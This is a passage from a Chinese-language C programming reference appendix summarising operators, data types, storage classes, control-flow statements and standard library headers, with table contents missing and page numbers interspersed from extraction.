C语言有大量的运算符。表B.2.1按优先级从高至低的顺序列出了C运算 符,并给出了其结合性。除非特别指明,否则所有运算符都是二元运算符 (需要两个运算对象)。注意,一些二元运算符和一元运算符的表示符号相 同,但是其优先级不同。例如,*(乘法运算符)和*(间接运算符)。表后 面总结了每个运算符的用法。 表B.2.1 C运算符 B.2.1 算术运算符 + 把右边的值加到左边的值上。 + 作为一元运算符,生成一个大小和符号都与右边值相同的值。 - 从左边的值中减去右边的值。 1529 - 作为一元运算符,生成一个与右边值大小相等符号相反的值。 * 把左边的值乘以右边的值。 / 把左边的值除以右边的值;如果两个运算对象都是整数,其结果要被 截断。 % 得左边值除以右边值时的余数 ++ 把右边变量的值加1(前缀模式),或把左边变量的值加1(后缀模 式)。 -- 把右边变量的值减1(前缀模式),或把左边变量的值减1(后缀模 式)。 B.2.2 关系运算符 下面的每个运算符都把左边的值与右边的值相比较。 <  小于 <=  小于或等于 ==  等于 >=  大于或等于 >  大于 !=  不等于 关系表达式 简单的关系表达式由关系运算符及其两侧的运算对象组成。如果关系为 真,则关系表达式的值为 1;如果关系为假,则关系表达式的值为0。下面 是两个例子: 1530 5 > 2 关系为真,整个表达式的值为1。 (2 + a) == a 关系为假,整个表达式的值为0。 B.2.3 赋值运算符 C语言有一个基本赋值运算符和多个复合赋值运算符。=运算符是基本 的形式: = 把它右边的值赋给其左边的左值。 下面的每个赋值运算符都根据它右边的值更新其左边的左值。我们使用 R-H表示右边,L-R表示左边。 += 
把左边的变量加上右边的量,并把结果储存在左边的变量中。 -= 从左边的变量中减去右边的量,并把结果储存在左边的变量中。 *= 把左边的变量乘以右边的量,并把结果储存在左边的变量中。 /= 把左边的变量除以右边的量,并把结果储存在左边的变量中。 %= 得到左边量除以右边量的余数,并把结果储存在左边的变量中。 &= 把L-H & R-H的值赋给左边的量,并把结果储存在左边的变量中。 |= 把L-H | R-H的值赋给左边的量,并把结果储存在左边的变量中。 ^= 把L-H ^ R-H的值赋给左边的量,并把结果储存在左边的变量中。 >>= 把L-H >> R-H的值赋给左边的量,并把结果储存在左边的变量中。 <<= 把L-H << R-H的值赋给左边的量,并把结果储存在左边的变量中。 示例 rabbits *= 1.6;与rabbits = rabbits * 1.6效果相同。 1531 B.2.4 逻辑运算符 逻辑运算符通常以关系表达式作为运算对象。!运算符只需要一个运算 对象,其他运算符需要两个运算对象,运算符左边一个,右边一个。 && 逻辑与 || 逻辑或 ! 逻辑非 1.逻辑表达式 当且仅当两个表达式都为真时,expresson1 && expresson 2的值才为 真。 两个表达式中至少有一个为真时,expresson 1 && expresson 2的值就为 真。 如果expresson的值为假,则!expresson为真,反之亦然。 2.逻辑表达式的求值顺序 逻辑表达式的求值顺序是从左往右。当发现可以使整个表达式为假的条 件时立即停止求值。 3.示例 6 > 2 && 3 == 3 为真。 !(6 > 2 && 3 == 3) 为假。 x != 0 && 20/x < 5 只有在x是非零时才会对第2个表达式求值。 B.2.5 条件运算符 1532 ?:有3个运算对象,每个运算对象都是一个表达式:expression1 ? expression2 : expression3 如果expression1为真,则整个表达式的值等于expression2的值;否则, 等于expression3的值。 示例 (5 > 3) ? 1 : 2的值为1。 (3 > 5) ? 1 : 2的值为2。 (a > b) ? a : b的值是a和b中较大者 B.2.6 与指针有关的运算符 &是地址运算符。当它后面是一个变量名时,&给出该变量的地址。 *是间接或解引用运算符。当它后面是一个指针时,*给出储存在指针指 向地址中的值。 示例 &nurse是变量nurse的地址: nurse = 22; ptr = &nurse; /* 指向nurse的指针 */ val = *ptr; 以上代码的效果是把22赋给val。 B.2.7 符号运算符 -是负号,反转运算对象的符号。 1533 + 是正号,不改变运算对象的符号。 B.2.8 结构和联合运算符 结构和联合使用一些运算符标识成员。成员运算符与结构和联合一起使 用,间接成员运算符与指向结构或联合的指针一起使用。 1.成员运算符 成员运算符(.)与结构名或联合名一起使用,指定结构或联合中的一 个成员。如果name是一个结构名,member是该结构模板指定的成员名,那 么name.member标识该结构中的这个成员。name.member的类型就是被指定 member的类型。在联合中也可以用相同的方式使用成员运算符。 示例 struct { int code; float cost; } item; item.code = 1265; 上面这条语句把1265赋给结构变量item的成员code。 2.间接成员运算符(或结构指针运算符) 间接成员运算符(->)与一个指向结构或联合的指针一起使用,标识该 结构或联合的一个成员。假设ptrstr是一个指向结构的指针,member是该结 构模板指定的成员,那么ptrstr->member标识了指针所指向结构的这个成 员。在联合中也可以用相同的方式使用间接成员运算符。 示例 1534 struct { int code; float cost; } item, * ptrst; ptrst = &item; ptrst->code = 3451; 以上程序段把3451赋给结构item的成员code。下面3种写法是等效的: ptrst->code item.code  (*ptrst).code B.2.9 按位运算符 下面所列除了~,都是按位运算符。 ~ 是一元运算符,它通过翻转运算对象的每一位得到一个值。 & 是逻辑与运算符,只有当两个运算对象中对应的位都为1时,它生成 的值中对应的位才为1。 | 是逻辑或运算符,只要两个运算对象中对应的位有一位为1,它生成的 值中对应的位就为1。 ^ 是按位异或运算符,只有两个运算对象中对应的位中只有一位为 1(不能全为1),它生成的值中对应的位才为1。 << 是左移运算符,把左边运算对象中的位向左移动得到一个值。移动 的位数由该运算符右边的运算对象确定,空出的位用0填充。 >> 是右移运算符,把左边运算对象中的位向右移动得到一个值。移动 的位数由该运算符右边的运算对象确定,空出的位用0填充。 1535 示例 假设有下面的代码: int x = 2; int y = 3; x & y的值为2,因为x和y的位组合中,只有第1位均为1。而y << x的值 为12,因为在y的位组合中,3的位组合向左移动两位,得到12。 B.2.10 混合运算符 sizeof给出它右边运算对象的大小,单位是char的大小。通常,char类型 的大小是1字节。运算对象可以圆括号中的类型说明符,如sizeof(float),也 可以是特定的变量名、数组名等,如sizeof foo。sizeof表达式的类型是 size_t。 _Alignof(C11)给出它的运算对象指定类型的对齐要求。一些系统要 求以特定值的倍数在地址上储存特定类型,如4的倍数。这个整数就是对齐 要求。 (类型名)是强制类型转换运算符,它把后面的值转换成圆括号中关键 字指定的类型。例如,(float)9把整数9转换成浮点数9.0。 ,是逗号运算符,它把两个表达式链接成一个表达式,并保证先对最左 端的表达式求值。整个表达式的值是最右边表达式的值。该运算符通常在 for循环头中用于包含更多的信息。 示例 for (step = 2, fargo = 0; fargo < 1000; step *= 2) fargo += step; 1536 B.3 参考资料III:基本类型和存储类别 B.3.1 总结:基本数据类型 C语言的基本数据类型分为两大类:整数类型和浮点数类型。不同的种 类提供了不同的范围和精度。 1.关键字 创建基本数据类型要用到8个关键字:int、long、short、unsigned、 char、float、double、signed(ANSI C)。 2.有符号整数 有符号整数可以具有正值或负值。 int是所有系统中基本整数类型。 long或long int可储存的整数应大于或等于int可储存的最大数;long至少 是32位。 short或short int整数应小于或等于int可储存的最大数;short至少是16 位。通常,long比short大。例如,在PC中的C DOS编译器提供16位的short和 int、32位的long。这完全取决于系统。 C99标准提供了long long类型,至少和long一样大,至少是64位。 3.无符号整数 无符号整数只有 0 和正值,这使得该类型能表示的正数范围更大。在所 需的类型前面加上关键字unsigned:unsigned int、unsigned long、unsigned short、unsigned long long。单独的unsigned相当于unsigned int。 4.字符 1537 字符是如A、&、+这样的印刷符号。根据定义,char类型的变量占用1 字节的内存。过去,char类型的大小通常是8位。然而,C在处理更大的字符 集时,char类型可以是16位,或者甚至是32位。 这种类型的关键字是char。一些实现使用有符号的char,但是其他实现 使用无符号的char。ANSI C允许使用关键字signed 和 unsigned指定所需类 型。从技术层面上看,char、unsigned char和signed char是3种不同的类型, 
但是char类型与其他两种类型的表示方法相同。 5.布尔类型(C99) _Bool是C99新增的布尔类型。它一个无符号整数类型,只能储存0(表 示假)或1(表示真)。包含stdbool.c头文件后,可以用bool表示_Bool、ture 表示1、false表示0,让代码与C++兼容。 6.实浮点数和复浮点数类型 C99识别两种浮点数类型:实浮点数和复浮点数。浮点类型由这两种类 型构成。 实浮点数可以是正值或负值。C识别3种实浮点类型。 float是系统中的基本浮点类型。它至少可以精确表示6位有效数字,通 常float为32位。 double(可能)表示更大的浮点数。它能表示比 float更多的有效数字和 更大的指数。它至少能精确表示10位有效数字。通常,double为64位。 long double(可能)表示更大的浮点数。它能表示比double更多的有效 数字和更大的指数。 复数由两部分组成:实部和虚部。C99 规定一个复数在内部用一个有两 个元素的数组表示,第 1 个元素表示实部,第2个元素表示虚部。有3种复浮 点数类型。 1538 float _Complex表示实部和虚部都是float类型的值。 double _Complex表示实部虚部都是double类型的值。 long double _Complex表示实部和虚部都是long double类型的值。 每种情况,前缀部分的类型都称为相应的实数类型(corresponding real type)。例如,double是double_Complex相应的实数类型。 C99中,复数类型在独立环境中是可选的,这样的环境中不需要操作系 统也可运行C程序。在C11中,复数类型在独立环境和主机环境都是可选 的。 有 3 种虚数类型。它们在独立环境中和主机环境中(C 程序在一种操作 系统下运行的环境)都是可选的。虚数只有虚部。这3种类型如下。 float _Imaginary表示虚部是float类型的值。 double _Imaginary表示虚部是double类型的值。 long double _Imaginary表示虚部是long double类型的值。 可以用实数和I值来初始化复数。I定义在complex.h头文件中,表示 i(即-1的平方根)。 #include <complex.h>        // I定义在该头文件中 double _Complex z = 3.0;      // 实部 = 3.0,虚部 = 0 double _Complex w = 4.0 * I;    // 实部 = 0.0,虚部 = 4.0 double Complex u = 6.0 – 8.0 * I; //实部= 6.0,虚部 = -8.0 前面章节讨论过,complex.h库包含一些返回复数实部和虚部的函数。 B.3.2 总结:如何声明一个简单变量 1539 1.选择所需的类型。 2.选择一个合适的变量名。 3.使用这种声明格式:type-specifiervariable-name; type-specifier由一个或多个类型关键字组成,下面是一些例子: int erest; unsigned short cash; 4.声明多个同类型变量时,使用逗号分隔符隔开各变量名: char ch, init, ans; 5.可以在声明的同时初始化变量: float mass = 6.0E24; 总结:存储类别 关键字:auto、extern、static、register、_Thread_local(C11) 一般注解: 变量的存储类别取决于它的作用域、链接和存储期。存储类别由声明变 量的位置和与之关联的关键字决定。定义在所有函数外部的变量具有文件作 用域、外部链接、静态存储期。声明在函数中的变量是自动变量,除非该变 量前面使用了其他关键字。它们具有块作用域、无链接、自动存储期。以 static关键字声明在函数中的变量具有块作用域、无链接、静态存储期。以 static关键字声明在函数外部的变量具有文件作用域、内部链接、静态存储 期。 C11 新增了一个存储类别说明符:_Thread_local。以该关键字声明的对 象具有线程存储期,意思是在线程中声明的对象在该线程运行期间一直存 1540 在,且在线程开始时被初始化。因此,这种对象属于线程私有。 属性: 下面总结了这些存储类别的属性: 续表 注意,关键字extern只能用来再次声明在别处已定义过的变量。在函数 外部定义变量,该变量具有外部链接属性。 除了以上介绍的存储类别,C 还提供了动态分配内存。这种内存通过调 用 malloc()函数系列中的一个函数来分配。这种函数返回一个可用于访问内 存的指针。调用 free()函数或结束程序可以释放动态分配的内存。任何可以 访问指向该内存指针的函数均可访问这块内存。例如,一个函数可以把这个 指针的值返回给另一个函数,那么另一个函数也可以访问该指针所指向的内 存。 B.3.3 总结:限定符 关键字 使用下面关键字限定变量: 1541 const、volatile、restrict 一般注释 限定符用于限制变量的使用方式。不能改变初始化以后的 const 变量。 编译器不会假设 volatile变量不被某些外部代理(如,一个硬件更新)改 变。restrict 限定的指针是访问它所指向内存的唯一方式(在特定作用域 中)。 属性 const int joy = 101;声明创建了变量joy,它的值被初始化为101。 volatile unsigned int incoming;声明创建了变量incoming,该变量在程序中 两次出现之间,其值可能会发生改变。 const int * ptr = &joy;声明创建了指针ptr,该指针不能用来改变变量joy的 值,但是它可以指向其他位置。 int * const ptr = &joy;声明创建了指针ptr,不能改变该指针的值,即ptr只 能指向joy,但是可以用它来改变joy的值。 void simple (const char * s);声明表明形式参数s被传递给simple()的值初始 化后,simple()不能改变s指向的值。 void supple(int * const pi);与void supple(int pi[const]);等价。这两个声明 都表明supple()函数不会改变形参pi。 void interleave(int * restrict p1, int * restrict p2, int n);声明表明p1和p2是访 问它们所指向内存的唯一方法,这意味着这两个块不能重叠。 1542 B.4 参考资料IV:表达式、语句和程序流 B.4.1 总结:表达式和语句 在C语言中,对表达式可以求值,通过语句可以执行某些行为。 表达式 表达式由运算符和运算对象组成。最简单的表达式是一个常量或一个不 带运算符的变量,如 22 或beebop。稍复杂些的例子是55 + 22和vap = 2 * (vip + (vup = 4))。 语句 大部分语句都以分号结尾。以分号结尾的表达式都是语句,但这样的语 句不一定有意义。语句分为简单语句和复合语句。简单语句以分号结尾,如 下所示: toes = 12;       // 赋值表达式语句 printf("%d\n", toes); // 函数调用表达式语句 ;           //空语句,什么也不做 (注意,在C语言中,声明不是语句。) 用花括号括起来的一条或多条语句是复合语句或块。如下面的while语 句所示: while (years < 100) { wisdom = wisdom + 1; printf("%d %d\n", years, wisdom); 1543 years = years + 1; } B.4.2 总结:while语句 关键字 while语句的关键字是while。 一般注释 while语句创建了一个循环,在expression为假之前重复执行。while语句 是一个入口条件循环,在下一轮迭代之前先确定是否要再次循环。因此可能 一次循环也不执行。statement可以是一个简单语句或复合语句。 形式 while ( expression ) statement 当expression为假(或0)之前,重复执行statement部分。 示例 while (n++ < 100) printf(" %d %d\n",n, 
2*n+1); while (fargo < 1000) { fargo = fargo + step; step = 2 * step; 1544 } B.4.3 总结:for语句 关键字 for语句的关键字是for。 一般注释 for语句使用3个控制表达式控制循环过程,分别用分号隔开。initialize 表达式在执行for语句之前只执行一次;然后对test表达式求值,如果表达式 为真(或非零),执行循环一次;接着对update表达式求值,并再次检查test 表达式。for语句是一种入口条件循环,即在执行循环之前就决定了是否执 行循环。因此,for循环可能一次都不执行。statement部分可以是一条简单语 句或复合语句。 形式: for ( initialize; test; update ) statement 在test为假或0之前,重复执行statement部分。 C99允许在for循环头中包含声明。变量的作用域和生命期被限制在for循 环中。 示例: for (n = 0; n < 10 ; n++) printf(" %d %d\n", n, 2 * n + 1); for (int k = 0; k < 10 ; ++k) // C99 1545 printf("%d %d\n", k, 2 * k+1); B.4.4 总结:do while语句 关键字 do while语句的关键字是do和while。 一般注解: do while语句创建一个循环,在expression为假或0之前重复执行循环体 中的内容。do while语句是一种出口条件循环,即在执行完循环体后才根据 测试条件决定是否再次执行循环。因此,该循环至少必须执行一次。 statement部分可是一条简单语句或复合语句。 形式: do statement while ( expression ); 在test为假或0之前,重复执行statement部分。 示例: do scanf("%d", &number); while (number != 20); B.4.5 总结:if语句 小结:用if语句进行选择 1546 关键字:if、else 一般注解: 下面各形式中,statement可以是一条简单语句或复合语句。表达式为真 说明其值是非零值。 形式1: if (expression) statement 如果expression为真,则执行statement部分。 形式2: if (expression) statement1 else statement2 如果expression为真,执行statement1部分;否则,执行statement2部分。 形式3: if (expression1) statement1 else if (expression2) statement2 1547 else statement3 如果expression1为真,执行statement1部分;如果expression2为真,执行 statement2部分;否则,执行statement3部分。 示例: if (legs == 4) printf("It might be a horse.\n"); else if (legs > 4) printf("It is not a horse.\n"); else   /* 如果legs < 4 */ { legs++; printf("Now it has one more leg.\n"); } B.4.6 带多重选择的switch语句 关键字:switch 一般注解: 程序控制根据expression的值跳转至相应的case标签处。然后,程序流执 行剩下的所有语句,除非执行到break语句进行重定向。expression和case标 签都必须是整数值(包括char类型),标签必须是常量或完全由常量组成的 1548 表达式。如果没有case标签与expression的值匹配,控制则转至标有default的 语句(如果有的话);否则,控制将转至紧跟在switch语句后面的语句。控 制转至特定标签后,将执行switch语句中其后的所有语句,除非到达switch 末尾,或执行到break语句。 形式: switch ( expression ) { case label1 : statement1//使用break跳出switch case label2 : statement2 default   : statement3 } 可以有多个标签语句,default语句可选。 示例: switch (value) { case 1 : find_sum(ar, n); break; case 2 : show_array(ar, n); break; case 3 : puts("Goodbye!"); 1549 break; default : puts("Invalid choice, try again."); break; } switch (letter) { case 'a' : case 'e' : printf("%d is a vowel\n", letter); case 'c' : case 'n' : printf("%d is in \"cane\"\n", letter); default : printf("Have a nice day.\n"); } 如果letter的值是'a'或'e',就打印这3条消息;如果letter的值是'c'或'n',则 只打印后两条消息;letter是其他值时,值打印最后一条消息。 B.4.7 总结:程序跳转 关键字:break、continue、goto 一般注解: 这3种语句都能使程序流从程序的一处跳转至另一处。 break语句: 1550 所有的循环和switch语句都可以使用break语句。它使程序控制跳出当前 循环或switch语句的剩余部分,并继续执行跟在循环或switch后面的语句。 示例: while ((ch = getchar()) != EOF) { putchar(ch); if (ch == ' ') break;    // 结束循环 chcount++; } continue语句: 所有的循环都可以使用continue语句,但是switch语句不行。continue语 句使程序控制跳出循环的剩余部分。对于while或for循环,程序执行到 continue语句后会开始进入下一轮迭代。对于do while循环,对出口条件求值 后,如有必要会进入下一轮迭代。 示例: while ((ch = getchar()) != EOF) { if (ch == ' ') continue; // 跳转至测试条件 1551 putchar(ch); chcount++; } 以上程序段打印用户输入的内容并统计非空格字符 goto语句: goto语句使程序控制跳转至相应标签语句。冒号用于分隔标签和标签语 句。标签名遵循变量命名规则。标签语句可以出现在goto的前面或后面。 形式: goto label ; label : statement 示例: top : ch = getchar(); if (ch != 'y') goto top; 1552 B.5 参考资料V:新增C99和C11的ANSI C库 ANSI C库把函数分成不同的组,每个组都有相关联的头文件。本节将 概括地介绍库函数,列出头文件并简要描述相关的函数。文中会较详细地介 绍某些函数(例如,一些I/O函数)。欲了解完整的函数说明,请参考具体 实现的文档或参考手册,或者试试这个在线参考: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/。 B.5.1 断言:assert.h assert.h 头文件中把 assert()定义为一个宏。在包含 assert.h 头文件之前定 义宏标识符NDEBUG,可以禁用assert()宏。通常用一个关系表达式或逻辑表 达式作为assert()的参数,如果运行正常,那么程序在执行到该点时,作为参 数的表达式应该为真。表B.5.1描述了assert()宏。 表B.5.1 断言宏 C11新增了static_assert宏,展开为_Static_assert。_Static_assert是一个关 
键字,被认为是一种声明形式。它以这种方式提供一个编译时检查: _Static_assert( 常量表达式,字符串字面量); 如果对常量表达式求值为0,编译器会给出一条包含字符串字面量的错 误消息;否则,没有任何效果。 B.5.2 复数:complex.h(C99) C99 标准支持复数计算,C11 进一步支持了这个功能。实现除提供 _Complex 类型外还可以选择是否提供_Imaginary类型。在C11中,可以选择 是否提供这两种类型。C99规定,实现必须提供_Complex类型,但是 _Imaginary类型为可选,可以提供或不提供。附录B的参考资料VIII中进一步 1553 讨论了C如何支持复数。complex.h头文件中定义了表B.5.2所列的宏。 表B.5.2 complex.h宏 对于实现复数方面,C和C++不同。C通过complex.h头文件支持,而 C++通过complex头文件支持。而且,C++使用类来定义复数类型。 可以使用STDC CX_LIMITED_RANGE编译指令来表明是使用普通的数 学公式(设置为on时),还是要特别注意极值(设置为off时): #include <complex.h> #pragma STDC CX_LIMITED_RANGE on 库函数分为3种:double、float、long double。表B.5.3列出了double版本 的函数。float和long double版本只需要在函数名后面分别加上f和l。即csinf() 就是csin()的float版本,而csinl()是csin()的long double版本。另外要注意,角 度的单位是弧度。 表B.5.3 复数函数 1554 续表 B.5.3 字符处理:ctype.h 这些函数都接受int类型的参数,这些参数可以表示为unsigned char类型 的值或EOF。使用其他值的效果是未定义的。在表B.5.4中,“真”表示“非0 值”。对一些定义的解释取决于当前的本地设置,这些由locale.h中的函数来 控制。该表显示了在解释本地化的“C”时要用到的一些函数。 表B.5.4 字符处理函数 1555 B.5.4 错误报告:errno.h errno.h头文件支持较老式的错误报告机制。该机制提供一个标识符(或 有时称为宏)ERRNO可访问的外部静态内存位置。一些库函数把一个值放 进这个位置用于报告错误,然后包含该头文件的程序就可以通过查看 ERRNO的值检查是否报告了一个特定的错误。ERRNO机制被认为不够艺 术,而且设置ERRNO值也不需要数学函数了。标准提供了3个宏值表示特殊 的错误,但是有些实现会提供更多。表B.5.5列出了这些标准宏。 表B.5.5 errno.h宏 B.5.5 浮点环境:fenv.h(C99) C99标准通过fenv.h头文件提供访问和控制浮点环境。 浮点环境(floating-point environment)由一组状态标志(status flag)和 1556 控制模式(control mode)组成。在浮点计算中发生异常情况时(如,被零 除),可以“抛出一个异常”。这意味着该异常情况设置了一个浮点环境标 志。控制模式值可以进行一些控制,例如控制舍入的方向。fenv.h头文件定 义了一组宏表示多种异常情况和控制模式,并提供了与环境交互的函数原 型。头文件还提供了一个编译指令来启用或禁用访问浮点环境的功能。 下面的指令开启访问浮点环境: #pragma STDC FENV_ACCESS on 下面的指令关闭访问浮点环境: #pragma STDC FENV_ACCESS off 应该把该编译指示放在所有外部声明之前或者复合块的开始处。在遇到 下一个编译指示之前、或到达文件末尾(外部指令)、或到达复合语句的末 尾(块指令),当前编译指示一直有效。 头文件定义了两种类型,如表B.5.6所示。 表B.5.6 fenv.h类型 头文件定义了一些宏,表示一些可能发生的浮点异常情况控制状态。其 他实现可能定义更多的宏,但是必须以FE_开头,后面跟大写字母。表B.5.7 列出了一些标准异常宏。 表B.5.7 fenv.h中的标准异常宏 1557 表B.5.8中列出了fenv.h头文件中的标准函数原型。注意,常用的参数值 和返回值与表B.5.7中的宏相对应。例如,FE_UPWARD是fesetround()的一个 合适参数。 表B.5.8 fenv.h中的标准函数原型 B.5.6 浮点特性:float.h float.h头文件中定义了一些表示各种限制和形参的宏。表B.5.9列出了这 1558 些宏,C11新增的宏以斜体并缩进标出。许多宏都涉及下面的浮点表示模 型: 如果第1个数f1是非0(且x是非0),该数字被称为标准化浮点数。附录 B的参考资料VIII中将更详细地解释一些宏。 表B.5.9 float.h宏 1 FLT_RADIX用于表示3种浮点数类型的基数。——译者注 续表 1559 B.5.7 整数类型的格式转换:inttypes.h 1560 该头文件定义了一些宏可用作转换说明来扩展整数类型。参考资料 VI“扩展的整数类型”将进一步讨论。该头文件还声明了这个类型: imaxdiv_t。这是一个结构类型,表示idivmax()函数的返回值。 该头文件中还包含 stdint.h,并声明了一些使用最大长度整数类型的函 数,这种整数类型在stdint.h中声明为intmax。表B.5.10列出了这些函数。 表B.5.10 使用最大长度整数的函数 B.5.8 可选拼写:iso646.h 该头文件提供了11个宏,扩展了指定的运算符,如表B.5.11所列。 表B.5.11 可 选 拼写 B.5.9 本地化:locale.h 1561 本地化是一组设置,用于控制一些特定的设置项,如表示小数点的符 号。本地值储存在struct lconv类型的结构中,定义在 locale.h 头文件中。可 以用一个字符串来指定本地化,该字符串指定了一组结构成员的特殊值。默 认的本地化由字符串"C"指定。表 B.5.12 列出了本地化函数,后面做了简要 说明。 表B.5.12 本地化函数 setlocale()函数的locale形参所需的值可能是默认值"C",也可能是"",表 示实现定义的本地环境。实现可以定义更多的本地化设置。category形参的 值可能由表B.5.13中所列的宏表示。 表B.5.13 category宏 表B.5.14列出了struct lconv结构所需的成员。 表B.5.14 struct lcconv所需的成员 1562 续表 1563 B.5.10 数学库:math.h C99为math.h头文件定义了两种类型:float_t和double_t。这两种类型分 别与float和double类型至少等宽,是计算float和double时效率最高的类型。 该头文件还定义了一些宏,如表B.5.15所列。该表中除了HUGE_VAL 外,都是C99新增的。在参考资料VIII:“C99数值计算增强”中会进一步详细 介绍。 表B.5.15 math.h宏 续表 1564 数学函数通常使用double类型的值。C99新增了这些函数的float和long double版本,其函数名为分别在原函数名后添加f后缀和l后缀。例如,C语言 现在提供这些函数原型: double sin(double); float sinf(float); long double sinl(long double); 篇幅有限,表B.5.16仅列出了数学库中这些函数的double版本。该表引 用了FLT_RADIX,该常量定义在float.h中,代表内部浮点表示法中幂的底 数。最常用的值是2。 表B.5.16 ANSI C标准数学函数 续表 1565 续表 1566 1 NaN 分为两类:quite NaN 和 singaling NaN。两者的区别是:quite NaN 的尾数部分最高位定义为 1,而singaling NaN最高位定义为0。——译者注 续表 1567 B.5.11 非本地跳转:setjmp.h setjmp.h 头文件可以让你不遵循通常的函数调用、函数返回顺序。 setjmp()函数把当前执行环境的信息(例如,指向当前指令的指针)储存在 jmp_buf类型(定义在setjmp.h头文件中的数组类型)的变量中,然后 
longjmp()函数把执行转至这个环境中。这些函数主要是用来处理错误条件, 并不是通常程序流控制的一部分。表B.5.17列出了这些函数。 表B.5.17 setjmp.h中的函数 B.5.12 信号处理:signal.h 信号(signal)是在程序执行期间可以报告的一种情况,可以用正整数 表示。raise()函数发送(或抛出)一个信号,signal()函数设置特定信号的响 应。 标准定义了一个整数类型:sig_atomic_t,专门用于在处理信号时指定 原子对象。也就是说,更新原子类型是不可分割的过程。 标准提供的宏列于表B.5.18中,它们表示可能的信号,可用作raise()和 signal()的参数。当然,实现也可以添加更多的值。 表B.5.18 信 号 宏 1568 signal()函数的第2个参数接受一个指向void函数的指针,该函数有一个 int类型的参数,也返回相同类型的指针。为响应一个信号而被调用的函数称 为信号处理器(signal handler)。标准定义了3个满足下面原型的宏: void (*funct)(int); 表B.5.19列出了这3种宏。 表B.5.19 void (*f)(int)宏 如果产生了信号sig,而且 func指向一个函数(参见表B.5.20中signal()原 型),那么大多数情况下先调用 signal(sig, SIG_DFL)把信号重置为默认设 置,然后调用(*func)(sig)。可以执行返回语句或调用abort()、exit()或 longjmp()来结束func指向的信号处理函数。 表B.5.20 信 号 函 数 B.5.13 对齐:stdalign.h(C11) stdalign.h头文件定义了4个宏,用于确定和指定数据对象的对齐属性。 1569 表B.5.21中列出了这些宏,其中前两个创建的别名与C++的用法兼容。 表B.5.21 void (*f)(int)宏 B.5.14 可变参数:stdarg.h stdarg.h 头文件提供一种方法定义参数数量可变的函数。这种函数的原 型有一个形参列表,列表中至少有一个形参后面跟有省略号: void f1(int n, ...);       /* 有效 */ int f2(int n, float x, int k, ...);/* 有效 */ double f3(...);         /* 无效 */ 在下面的表中,parmN是省略号前面的最后一个形参的标识符。在上面 的例子中,第1种情况的parmN为n,第2种情况的parmN为k。 头文件中声明了va_lis类型表示储存形参列表中省略号部分的形参数据 对象。表B.5.22中列出了3个带可变参数列表的函数中用到的宏。在使用这 些宏之前要声明一个va_list类型的对象。 表B.5.22 可变参数列表宏 1570 B.5.15 原子支持:stdatomic.h(C11) stdatomic.h和threads.h头文件支持并发编程。并发编程的内容超过了本 书讨论的范围,简单地说,stdatomic.h 头文件提供了创建原子操作的宏。编 程社区使用原子这个术语是为了强调不可分割的特性。一个操作(如,把一 个结构赋给另一个结构)从编程层面上看是原子操作,但是从机器语言层面 上看是由多个步骤组成。如果程序被分成多个线程,那么其中的线程可能读 或修改另一个线程正在使用的数据。例如,可以想象给一个结构的多个成员 赋值,不同线程给不同成员赋值。有了stdatomic.h头文件,就能创建这些可 以看作是不可分割的操作,这样就能保证线程之间互不干扰。 B.5.16 布尔支持:stdbool.h(C99) stdbool.h头文件定义了4个宏,如表B.5.23所列。 表B.5.23 stdbool.h宏 B.5.17 通用定义:stddef.h 该头文件定义了一些类型和宏,如表B.5.24和表B.5.25所列。 表B.5.24 stddef.h类型 表B.5.25 stddef.h宏 1571 示例 #include <stddef.h> struct car { char brand[30]; char model[30]; double hp; double price; }; int main(void) { size_t into = offsetof(struct car, hp); /* hp成员的偏移量 */ ... 
B.5.18 整数类型:stdint.h stdint.h头文件中使用typedef工具创建整数类型名,指定整数的属性。 stdint.h头文件包含在inttypes.h中,后者提供输入/输出函数调用的宏。参考资 料VI的“扩展的整数类型”中介绍了这些类型的用法。 1572 1.精确宽度类型 stdint.h头文件中用一组typedef标识精确宽度的类型。表B.5.26列出了它 们的类型名和大小。然而,注意,并不是所有的系统都支持其中的所有类 型。 表B.5.26 确切宽度类型 2.最小宽度类型 最小宽度类型保证其类型的大小至少是某数量位。表B.5.27列出了最小 宽度类型,系统中一定会有这些类型。 表B.5.27 最小宽度类型 3.最快最小宽度类型 在特定系统中,使用某些整数类型比其他整数类型更快。为此,stdint.h 1573 也定义了最快最小宽度类型,如表B.5.28所列,系统中一定会有这些类型。 表B.5.28 最快最小宽度类型 4.最大宽度类型 stdint.h 头文件还定义了最大宽度类型。这种类型的变量可以储存系统 中的任意整数值,还要考虑符号。表B.5.29列出了这些类型。 表B.5.29 最大宽度类型 5.可储存指针值的整数类型 stdint.h头文件中还包括表B.5.30中所列的两种整数类型,它们可以精确 地储存指针值。也就是说,如果把一个void *类型的值赋给这种类型的变 量,然后再把该类型的值赋回给指针,不会丢失任何信息。系统可能不支持 这类型。 表B.5.30 可储存指针值的整数类型 6.已定义的常量 1574 stdint.h头文件定义了一些常量,用于表示该头文件中所定义类型的限定 值。常量都根据类型命名,即用_MIN或_MAX代替类型名中的_t,然后把所 有字母大写即得到表示该类型最小值或最大值的常量名。例如,int32_t类型 的最小值是INT32_MIN、unit_fast16_t的最大值是UNIT_FAST16_MAX。表 B.5.31总结了这些常量以及与之相关的intptr_t、unitptr_t、intmax_t和uintmax_t 类型,其中的N表示位数。这些常量的值应等于或大于(除非指明了一定要 等于)所列的值。 表B.5.31 整 型 常 量 该头文件还定义了一些别处定义的类型使用的常量,如表B.5.32所示。 表B.5.32 其他整型常量 1575 7.扩展的整型常量 stdin.h头文件定义了一些宏用于指定各种扩展整数类型。从本质上看, 这种宏是底层类型(即在特定实现中表示扩展类型的基本类型)的强制转 换。 把类型名后面的_t 替换成_C,然后大写所有的字母就构成了一个宏 名。例如,使用表达式UNIT_LEAST64_C(1000)后,1000就是unit_least64_t 类型的常量。 B.5.19 标准I/O库:stdio.h ANSI C标准库包含一些与流相关联的标准I/O函数和stdio.h头文件。表 B.5.33列出了ANSI中这些函数的原型和简介(第13章详细介绍过其中的一些 函数)。stdio.h头文件定义了FILE类型、EOF和NULL的值、标准I/O流 (stdin、stdout和stderr)以及标准I/O库函数要用到的一些常量。 表B.5.33 C标准I/O函数 1576 续表 1577 B.5.20 通用工具:stdlib.h ANSI C标准库在stdlib.h头文件中定义了一些实用函数。该头文件定义 了一些类型,如表B.5.34所示。 表B.5.34 stdlib.h中声明的类型 1578 stdlib.h头文件定义的常量列于表B.5.35中。 表B.5.35 stdlib.h中定义的常量 表B.5.36列出了stdlib.h中的函数原型。 表B.5.36 通 用 工 具 1579 续表 1580 续表 1581 续表 1582 B.5.21 _Noreturn:stdnoreturn.h 